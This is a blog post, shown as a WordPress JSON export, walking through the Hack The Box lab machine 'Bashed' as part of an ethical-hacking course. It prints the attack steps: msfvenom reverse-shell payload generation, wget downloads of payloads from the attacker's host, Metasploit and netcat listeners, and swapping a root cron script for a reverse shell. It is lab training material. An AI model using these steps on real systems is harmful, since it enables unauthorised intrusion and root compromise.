{"id":504,"date":"2020-07-07T08:52:39","date_gmt":"2020-07-07T07:52:39","guid":{"rendered":"http:\/\/vroamam.com\/wordpress\/?p=504"},"modified":"2020-07-25T11:20:13","modified_gmt":"2020-07-25T10:20:13","slug":"bashed-htb-writeup","status":"publish","type":"post","link":"https:\/\/vroamam.com\/wordpress\/blog\/bashed-htb-writeup\/","title":{"rendered":"Bashed – HTB Writeup"},"content":{"rendered":"\n

Continuing the Practical Ethical Hacking course written and presented by The Cyber Mentor on Udemy, I attempted the next box in his Mid-Course Capstone – Bashed.<\/p>\n\n\n\n

This one I found very tough and I had to look to the course material for help, but it turns out I only found it tough because I didn’t pay enough attention to detail. <\/p>\n\n\n\n

There is a theme emerging here.<\/p>\n\n\n\n

Recon<\/h3>\n\n\n\n

As we do at the start, I ran the Nmap<\/em> scan as prescribed by TCM<\/p>\n\n\n\n

Nmap -A -T4 -p- 10.10.10.68<\/code><\/pre>\n\n\n\n
This brought back very little. The highlights were:<\/p>\n\n\n\n
PORT   STATE SERVICE VERSION\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Arrexel's Development Site\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\n<\/code><\/pre>\n\n\n\n
Key takeaways from that scan were<\/p>\n\n\n\n
Open Ports<\/strong>
 –80<\/p>\n\n\n\n
OS<\/strong>
 –Ubuntu (Nmap)<\/p>\n\n\n\n
Applications<\/strong>
 –Apache 2.4.18<\/p>\n\n\n\n
The obvious target was Apache. So I ran a quick check with searchsploit<\/em> and found nothing of any use.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Time to look at the website itself. The opening page is just a list of posts, none of the links go anywhere when you hover over them, but there is one blog post that you can browse to<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Let’s take a look at that single blog post in more detail.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
This is where I messed up. I didn’t pay nearly enough attention to this page and completely missed the point of it entirely by expecting there to be some vulnerability\/exploit and not that the page itself would be the clue. So what do we see here<\/p>\n\n\n\n
Starting with the text:<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The site actually tells us that the author developed a pentesting tool on this server. He also links to his own GitHub… what does github say about phpbash?<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So this server was used to develop a php based web shell, getting the idea yet?<\/p>\n\n\n\n
The video that runs underneath the text seems to suggest there is an uploads directory<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Browsing to that folder reveals nothing, but what other directories might exist? Time to look for other directories\/folders. I used Dirbuster<\/em>, solely because it’s what is used throughout the course, reviewing the results of the search I found phpbash.php in a Dev folder – phpbash was the pentesting tool developed on this server (remember the github explanation) <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
It seems sensible to at least try and load that and see what happens browse to http:\/\/10.10.10.68\/dev\/phpbash.php<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I missed this completely, I initially thought it was just an information leak, but that cursor at the bottom is flashing… its a live shell, so who are we and what permissions do we have? <\/p>\n\n\n\n
whoami<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
sudo -l<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Ok, so we are www-data and appear to be a normal user with some sudo privileges for the user scriptmanager. <\/p>\n\n\n\n
What can we find, lets have a look around – where are we now<\/p>\n\n\n\n
pwd<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Are there any user folders?<\/p>\n\n\n\n
cd \/home\nls<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Two user directories, check them and you’ll find the user flag<\/p>\n\n\n\n
Privesc<\/h3>\n\n\n\n
NOTE: I did this over several days and my LHOST IP changes throughout the images and narrative. Make sure you use YOUR LHOST  IP Address<\/strong><\/p>\n\n\n\n
So far we do only have user permissions, how can we increase our privileges. Remember the sudo -l at the start, we can do some things as the user scriptmanager lets try<\/p>\n\n\n\n
sudo su scriptmanager<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
That hasn’t worked. We need a proper shell to proceed. So to “earn” the flags having turned to the course material for some pointers, I decided I would do this first with meterpreter<\/em>\/msfvenom<\/em> and then without<\/p>\n\n\n\n
Reverse shell using meterpreter\/msfvenom<\/h4>\n\n\n\n
Lets generate the payload file using msfvenom<\/em> A quick google search helps us with the command<\/p>\n\n\n\n
msfvenom -p php\/meterpreter_reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f raw > shell.php<\/code><\/pre>\n\n\n\n
Start SimpleHTTPServer<\/em> to serve up the payload file<\/p>\n\n\n\n
sudo python3 -m http.server 80 \nor \nsudo python -m SimpleHTTPServer 80<\/pre>\n\n\n\n
Navigate to the uploads directory using the phpbash shell and use wget<\/em> to upload the payload file<\/p>\n\n\n\n
cd \/var\/www\/html\/uploads\nwget http:\/\/10.10.14.21\/shell.php<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Start a reverse handler in metasploit<\/em><\/p>\n\n\n\n
msfconsole\nuse exploit\/multi\/handler\nset lhost 10.10.14.21\nset lport 4444\nset payload php\/meterpreter_reverse_tcp\nrun<\/code><\/pre>\n\n\n\n
Run the payload file by browsing to it http:\/\/10.10.14.21\/shell.php<\/p>\n\n\n\n
Meterpreter<\/em> reverse shell should start<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Reverse shell WITHOUT Meterpreter<\/h3>\n\n\n\n
There is an alternate route to the PHP reverse shell that doesn’t require Metasploit<\/em>. Check out https:\/\/pentestmonkey.net<\/a> where pentestmonkey  has kindly gathered a list of reverse shells in various languages\/script readily available. Lets try the PHP reverse shell, downloaded the “feature rich and robust” version he has linked. <\/p>\n\n\n\n
Extract the file from the TAR and edit the appropriate lines to match your IP address (LHOST) and port (LPORT) and save the changes. <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Put the file somewhere it can be served up by SimpleHTTPServer<\/em>, Go back to the phpbash shell make sure you are in the uploads folder and use wget<\/em> to upload the new php file you just created.<\/p>\n\n\n\n
Start a netcat <\/em>listener using the port you put into the php file.<\/p>\n\n\n\n
nc -nvlp 1234<\/code><\/pre>\n\n\n\n
\"This<\/figure>\n\n\n\n
Run the reverse shell file, open a new tab in your browser and load the page, I called mine rev.php so my URL looks like this  – http:\/\/10.10.14.10\/rev.php – change the filename to whatever you used.<\/p>\n\n\n\n
Ok so now we have a “proper” shell we can see what we can do. We are still www-data at this point<\/p>\n\n\n\n
\"\"
meterpreter<\/figcaption><\/figure>\n\n\n\n
\"\"
netcat<\/figcaption><\/figure>\n\n\n\n
Lets have a browse around, I started by going to the top folder and listing out all files.<\/p>\n\n\n\n
cd \/\nls -al<\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The standout here is the scripts folder, lets try and have a closer look.<\/p>\n\n\n\n
\"\"
meterpreter<\/figcaption><\/figure>\n\n\n\n
\"\"
netcat<\/figcaption><\/figure>\n\n\n\n
That didn’t work. Why? Because the folder is owned by scriptmanager and we are still www-data. As I recall we have some sudo rights to scriptmanager so lets see if we can sudo to that user. If you are using meterpreter, you’ll need to drop into a shell. Type the command “shell”<\/p>\n\n\n\n
sudo su scriptmanager<\/code><\/pre>\n\n\n\n
\"\"
meterpreter<\/figcaption><\/figure>\n\n\n\n
\"\"
netcat<\/figcaption><\/figure>\n\n\n\n
That didn’t work, lets see if we can run programs as scriptmanager. In this case lets see if we can start a new shell as that user.<\/p>\n\n\n\n
sudo -u scriptmanager \/bin\/bash<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Regardless of which reverse shell you are using the output should now be the same and you should have elevated your privileges to the scriptmanager user.<\/p>\n\n\n\n
Lets go and checkout that scripts folder<\/p>\n\n\n\n
cd scripts\nls -al<\/pre>\n\n\n\n
We can see in the listing that there are two files, test.py and test.txt lets have a look at whats inside them. <\/p>\n\n\n\n
I was let down here by my own attention to detail and needed a pointer from my course material but checkout the creation time on the .txt file against the local system time.<\/p>\n\n\n\n
I missed this, it’s a reminder to me that I have to pay attention to every detail no matter how small and maybe to include an audit of scheduled tasks\/cron jobs if I can get it. The datetime stamp on the txt file changes every minute. That suggests its been run as a scheduled task.<\/p>\n\n\n\n
Also note that the .txt file is owned by root so the python task is probably being run as root. <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
If we can replace that .py file with our own malicious file then we can get a shell and if it’s run as root the shell will  be in the context of the root user.<\/p>\n\n\n\n
So to ‘earn’ the flags here I did the same again, two different reverse shells, first without meterpreter<\/p>\n\n\n\n
Python Reverse Shell WITHOUT Meterpreter<\/h3>\n\n\n\n
Lets go back and look at pentestmonkey’s list of reverse shells – yep there is a python one (feel free to write your own if you wish)<\/p>\n\n\n\n
\"\"
http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet<\/a><\/figcaption><\/figure>\n\n\n\n
Copy and past the code and save the file as test.py – remember to change the IP and port in the highlighted section above to match your LHOST and LPORT, you might also want to try and change the shell to run \/bin\/bash instead of \/bin\/sh<\/p>\n\n\n\n
Start a netcat<\/em> listener on the port you configured in the script then upload it to the folder the same way we did earlier with SimpleHTTPServer<\/em> and wget<\/em> and wait.<\/p>\n\n\n\n
Once the task re-runs, assuming you’ve configured everything correctly, you should see you listener connect and you shoujld have a shell running as root.<\/p>\n\n\n\n
\"\"
Reverse shell as root<\/figcaption><\/figure>\n\n\n\n
Python Reverse Shell Using meterpreter\/msfvenom<\/h3>\n\n\n\n
So that I had done something on my own and to extend my learning and practice further, I chose to redo the last stage with a meterpreter reverse shell.<\/p>\n\n\n\n
 I loaded Metasploit, loaded exploit\/multi\/handler and did show payloads<\/p>\n\n\n\n
msfconsole\nuse exploit\/multi\/handler\nshow payloads<\/code><\/pre>\n\n\n\n
Looking at the list I chose what I believe to be a staged reverse TCP shell payload and created the file with msfvenom<\/p>\n\n\n\n
msfvenom -p python\/meterpreter\/reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f raw > test_3.php<\/code><\/pre>\n\n\n\n
I then removed the old test.py and uploaded the payload using wget and SimpleHTTPServer  <\/p>\n\n\n\n
rm -f test.py\nwget http:\/\/10.10.14.21\/test_3.py -O test.py\n<\/pre>\n\n\n\n
On this occasion I had saved the payload with a different name so as not to overwrite the earlier one, I used the wget switch -O to change the name during transfer.<\/p>\n\n\n\n
Once uploaded, it’s just a matter of waiting for the cron job to run and the shell to appear, it shouldn’t take more than a minute.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I’ll leave the rest to you.<\/p>\n","protected":false},"excerpt":{"rendered":"
Continuing the Practical Ethical Hacking course written and presented by The Cyber Mentor on Udemy, I attempted the next box in his Mid-Course Capstone – Bashed.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[87,2,86,3],"tags":[88,7,6,85,91],"class_list":["post-504","post","type-post","status-publish","format-standard","hentry","category-ctf","category-cybersec","category-hackthebox","category-training","tag-ctf","tag-cyber-security","tag-ethical-hacking","tag-hackthebox","tag-htb","entry"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/pahuGk-88","jetpack_likes_enabled":true,"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/comments?post=504"}],"version-history":[{"count":20,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/504\/revisions"}],"predecessor-version":[{"id":569,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/504\/revisions\/569"}],"wp:attachment":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/media?parent=504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/categories?post=504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/tags?post=504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}